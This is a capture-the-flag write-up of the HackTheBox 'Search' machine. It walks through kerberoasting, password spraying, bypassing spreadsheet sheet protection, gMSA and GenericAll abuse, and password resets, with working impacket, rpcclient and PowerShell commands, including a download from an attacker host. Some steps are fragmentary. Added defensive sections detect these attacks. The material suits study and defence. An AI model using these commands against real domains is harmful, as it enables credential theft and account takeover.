HackTheBox-Search

NMAP

PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-19 09:28:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft IIS httpd 10.0
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8172/tcp open ssl/http Microsoft IIS httpd 10.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49699/tcp open unknown
49725/tcp open msrpc Microsoft Windows RPC

PORT 139/445 (SMB)

We can check for null authentication on SMB to see whether we can access any shares.

PORT 80 (HTTP)

On the IIS server we can see a template being used.

Foothold

We have a service account, web_svc. Let's try kerberoasting: since we have a valid set of credentials we can request a TGS for this account, or just provide the username list so that maybe we get other accounts' hashes too. Using impacket's GetUserSPNs:

python3 /opt/impacket/examples/GetUserSPNs.py -target-domain search.htb -request -dc-ip 10.129.247.201 -usersfile new_users.txt search.htb/hope.sharp
python3 /opt/impacket/examples/GetUserSPNs.py -request -dc-ip 10.129.247.201 search.htb/hope.sharp:"IsolationIsKey?" -outputfile hashes.kerberoast

Privilege Escalation (Edgar.Jacobs)

We still have access to SMB, and we still have a lot of usernames, so we can try a password spray with kerbrute.
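Both Kerberos steps in this writeup (the TGS requests made by GetUserSPNs and the pre-auth failures a kerbrute spray produces) leave distinctive traces on the domain controller. The following is an added detection example, not part of the original writeup: it runs two simple rules over constructed sample events that mirror the fields of Windows Security events 4769 (service ticket requested) and 4771 (pre-authentication failed). The source address 10.10.14.5, the svc-sample-* service names and the spray-user-* accounts are made-up values; the thresholds are assumptions a defender would tune to their own environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"        # ticket encryption type kerberoasting tools ask for
PREAUTH_FAILED = "0x18"  # KDC_ERR_PREAUTH_FAILED: valid user, wrong password

# Constructed sample events (not logs from the box), reduced to the fields the
# rules need. The source IP, svc-sample-* and spray-user-* names are invented.
SAMPLE_EVENTS = [
    {"id": 4769, "ts": "2021-12-19T09:30:01", "account": "hope.sharp@SEARCH.HTB", "service": "web_svc", "etype": "0x17", "src": "10.10.14.5"},
    {"id": 4769, "ts": "2021-12-19T09:30:02", "account": "hope.sharp@SEARCH.HTB", "service": "svc-sample-1", "etype": "0x17", "src": "10.10.14.5"},
    {"id": 4769, "ts": "2021-12-19T09:30:02", "account": "hope.sharp@SEARCH.HTB", "service": "svc-sample-2", "etype": "0x17", "src": "10.10.14.5"},
    # normal traffic: an AES ticket for a user SPN and an RC4 ticket for a machine account
    {"id": 4769, "ts": "2021-12-19T09:31:00", "account": "sierra.frye@SEARCH.HTB", "service": "web_svc", "etype": "0x12", "src": "10.129.247.50"},
    {"id": 4769, "ts": "2021-12-19T09:31:05", "account": "edgar.jacobs@SEARCH.HTB", "service": "RESEARCH$", "etype": "0x17", "src": "10.129.247.50"},
    # six different users failing pre-auth from one source within 30 seconds
    *[{"id": 4771, "ts": f"2021-12-19T09:40:{5 * i:02d}", "account": f"spray-user-{i}", "status": "0x18", "src": "10.10.14.5"} for i in range(6)],
    # one user mistyping a password once
    {"id": 4771, "ts": "2021-12-19T09:41:00", "account": "sierra.frye", "status": "0x18", "src": "10.129.247.50"},
]


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def kerberoast_candidates(events, min_services=1):
    """Return {requesting account: sorted service names} for accounts that obtained
    RC4-encrypted (etype 0x17) service tickets for user SPN accounts. Machine
    accounts (trailing $) and krbtgt are ignored; RC4 tickets for user accounts
    with SPNs are what GetUserSPNs asks for, because those hashes crack fastest."""
    per_account = defaultdict(set)
    for e in events:
        if e["id"] != 4769 or e["etype"] != RC4_HMAC:
            continue
        svc = e["service"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        per_account[e["account"]].add(svc)
    return {a: sorted(s) for a, s in per_account.items() if len(s) >= min_services}


def password_spray_sources(events, window=timedelta(minutes=5), min_accounts=5):
    """Return {source IP: distinct accounts} for sources that produced pre-auth
    failures (4771, status 0x18) against at least min_accounts different users
    inside any window-sized interval. A spray hits many users once each; a user
    mistyping a password hits one user a few times."""
    by_src = defaultdict(list)
    for e in events:
        if e["id"] == 4771 and e["status"] == PREAUTH_FAILED:
            by_src[e["src"]].append(e)
    alerts = {}
    for src, evs in by_src.items():
        evs.sort(key=_ts)
        best = 0
        for i, start in enumerate(evs):
            in_window = {x["account"] for x in evs[i:] if _ts(x) - _ts(start) <= window}
            best = max(best, len(in_window))
        if best >= min_accounts:
            alerts[src] = best
    return alerts


if __name__ == "__main__":
    print("kerberoast candidates:", kerberoast_candidates(SAMPLE_EVENTS))
    print("spray sources:", password_spray_sources(SAMPLE_EVENTS))
```

On a real domain controller the same fields come from the Security log (TicketEncryptionType, ServiceName, IpAddress on 4769; Status, TargetUserName, IpAddress on 4771); forcing AES-only for service accounts removes the cheap RC4 hashes that make kerberoasting worthwhile, and both rules are cheap enough to run as scheduled searches in a SIEM.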

Privilege Escalation (Sierra.Frye)

Opening the xlsx document, we can see two worksheets: the first one just shows statistics of how many passwords were captured, and the other shows the usernames with passwords, but that worksheet is password protected and has rows or columns hidden, so there are two ways to read the passwords in this scenario.

</sheetData><sheetProtection algorithmName="SHA-512" hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg==" saltValue="U9oZfaVCkz5jWdhs9AA8nA==" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
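The sheetProtection element above only stores a salted hash that Excel checks before letting the user unhide rows or columns; the cell values themselves sit in clear text in the worksheet XML inside the zip. The following is an added audit example (not from the writeup) that a defender could run over a file share to find spreadsheets relying on sheet protection to hide data: it builds a constructed minimal .xlsx with one protected sheet, a hidden column and a hidden row (the hash and salt values are placeholders, the cell contents are made up), and reports what protection each worksheet relies on and how many cell values are readable anyway.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}


def build_sample_workbook():
    """Constructed minimal .xlsx (a zip of XML parts) with one protected sheet that
    hides column C and row 2. Strings are inline here; real workbooks usually keep
    them in xl/sharedStrings.xml, which is just as readable. Placeholder hash/salt."""
    sheet = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
        '<cols><col min="3" max="3" width="0" hidden="1"/></cols>'
        '<sheetData>'
        '<row r="1"><c r="A1" t="inlineStr"><is><t>user-sample-1</t></is></c>'
        '<c r="C1" t="inlineStr"><is><t>password-sample-1</t></is></c></row>'
        '<row r="2" hidden="1"><c r="A2" t="inlineStr"><is><t>user-sample-2</t></is></c>'
        '<c r="C2" t="inlineStr"><is><t>password-sample-2</t></is></c></row>'
        '</sheetData>'
        '<sheetProtection algorithmName="SHA-512" hashValue="PLACEHOLDER==" '
        'saltValue="PLACEHOLDER==" spinCount="100000" sheet="1" objects="1" scenarios="1"/>'
        '</worksheet>'
    )
    workbook = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<sheets><sheet name="Captured" sheetId="1" r:id="rId1"/></sheets></workbook>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/worksheets/sheet1.xml", sheet)
    return buf.getvalue()


def _is_hidden(element):
    return element.get("hidden") in ("1", "true")


def audit_sheet_protection(xlsx_bytes):
    """For every worksheet part, report whether it carries sheetProtection, which
    rows/columns are hidden, and how many cell values are stored in clear text.
    'risk' is set when protection is combined with hidden data, i.e. when the
    author is relying on a UI lock, not encryption, to keep something secret."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        for name in sorted(z.namelist()):
            if not re.fullmatch(r"xl/worksheets/sheet\d+\.xml", name):
                continue
            root = ET.fromstring(z.read(name))
            prot = root.find("m:sheetProtection", NS)
            hidden_rows = [r.get("r") for r in root.iterfind("m:sheetData/m:row", NS) if _is_hidden(r)]
            hidden_cols = [(c.get("min"), c.get("max")) for c in root.iterfind("m:cols/m:col", NS) if _is_hidden(c)]
            cells = sum(
                1 for c in root.iterfind("m:sheetData/m:row/m:c", NS)
                if c.find("m:v", NS) is not None or c.find("m:is", NS) is not None
            )
            findings.append({
                "part": name,
                "protected": prot is not None,
                "hash_algorithm": prot.get("algorithmName") if prot is not None else None,
                "hidden_rows": hidden_rows,
                "hidden_cols": hidden_cols,
                "cleartext_cells": cells,
                "risk": bool(prot is not None and (hidden_rows or hidden_cols)),
            })
    return findings


if __name__ == "__main__":
    for f in audit_sheet_protection(build_sample_workbook()):
        print(f)
```

The takeaway for anyone handling credential exports: sheet protection and hidden ranges are presentation controls; only workbook encryption (Excel's "Encrypt with Password", which wraps the whole package) keeps the XML out of reach, and credentials should not live in spreadsheets on a shared folder at all.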

Privilege Escalation (Tristan.Davies -> Administrator)

This user is a member of the ITSEC group, which has ReadGMSAPassword rights over the account BIR-ADFS-GMSA. GMSA stands for Group Managed Service Account: in Active Directory it's a hassle to change service account passwords, so this gMSA account takes care of service account passwords, and its hash isn't easy to crack as the password is randomly generated.

Method 1 (un-intended)

WinRM was completely disabled on this machine, and it was disabled after almost 50 users had rooted it; WinRM wasn't supposed to be running on the machine (at least that's what they said in the Discord). So, having the ability to get a remote session, we could simply log in as the account that has GenericAll, meaning we can do anything with that user account, so simply changing the password was possible: net user username password

Method 2 (intended)

Since WinRM was disabled, and there wasn't any way to get a shell and change the password through net user, another way was this: since rpcclient allows pass-the-hash, we can log in as BIR-ADFS-GMSA with its password hash and change the password with this command

setuserinfo2 Tristan.Davies 23 'arzismol'
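Whichever of the methods above is used, the result on the domain controller is the same: a password reset of Tristan.Davies performed by another principal, which Windows records as Security event 4724 ("An attempt was made to reset an account's password") with the resetting account as Subject and the reset account as Target. The following is an added detection example, not part of the writeup, run over constructed sample events; the helpdesk.sample account, the watch list and the logon IDs are assumptions standing in for an organisation's own approved password-reset principals and tier-0 accounts.

```python
# Constructed sample of Security event 4724, reduced to the fields the rule
# needs (not real logs). helpdesk.sample and the logon IDs are made up.
SAMPLE_RESETS = [
    {"ts": "2021-12-19T10:02:11", "subject": "helpdesk.sample", "target": "edgar.jacobs", "logon_id": "0x1a2b"},
    {"ts": "2021-12-19T10:05:40", "subject": "BIR-ADFS-GMSA$", "target": "Tristan.Davies", "logon_id": "0x3c4d"},
    {"ts": "2021-12-19T10:06:00", "subject": "helpdesk.sample", "target": "sierra.frye", "logon_id": "0x1a2b"},
]

# Assumed policy inputs: who may reset other people's passwords, and which
# accounts should never have their password reset without a ticket.
APPROVED_RESETTERS = {"helpdesk.sample"}
WATCHED_TARGETS = {"tristan.davies", "administrator"}


def suspicious_resets(events, approved=APPROVED_RESETTERS, watched=WATCHED_TARGETS):
    """Return one alert per 4724 event that breaks policy, with the reasons.
    A reset of one's own account is skipped (that is a 4723 change anyway);
    a reset by a service or computer account (trailing $) is always odd, because
    a gMSA exists to run a service, not to administer users, and a reset of a
    watched account is reported whoever performs it."""
    approved_lc = {a.lower() for a in approved}
    watched_lc = {w.lower() for w in watched}
    alerts = []
    for e in events:
        subj, tgt = e["subject"], e["target"]
        if subj.lower() == tgt.lower():
            continue
        reasons = []
        if subj.lower() not in approved_lc:
            reasons.append("subject is not an approved password-reset principal")
        if subj.endswith("$"):
            reasons.append("subject is a service or computer account")
        if tgt.lower() in watched_lc:
            reasons.append("target is a watched privileged account")
        if reasons:
            alerts.append({"ts": e["ts"], "subject": subj, "target": tgt, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in suspicious_resets(SAMPLE_RESETS):
        print(alert)
```

The preventive counterpart is an ACL review: the GenericAll that makes the unintended method work, and the ReadGMSAPassword/PrincipalsAllowedToRetrieveManagedPassword membership that makes the intended one work, are both visible in the directory before anyone uses them, which is exactly what BloodHound-style ACL audits are for.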

Method 3

Going into Sierra.Frye's directory through the SMB share RedirectedFolders$ we can see a file in Downloads\Backups\

Invoke-WebRequest -Uri http://ip/dsinternals.zip -UseBasicParsing -OutFile dsinternals.zip
Expand-Archive -Path dsinternals.zip -DestinationPath dsinternals
Import-Module .\dsinternals\DSInternals   # module path assumed from the Expand-Archive destination above
Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA$' -Properties PrincipalsAllowedToRetrieveManagedPassword
# $pt holds the decoded msDS-ManagedPassword blob obtained with the DSInternals module
$Credential = New-Object System.Management.Automation.PSCredential 'BIR-ADFS-GMSA$', $pt.SecureCurrentPassword
Invoke-Command -ComputerName Research -Credential $Credential -ScriptBlock { whoami }
Invoke-Command -ComputerName Research -Credential $Credential -ScriptBlock { net user Tristan.Davies arzissmol }
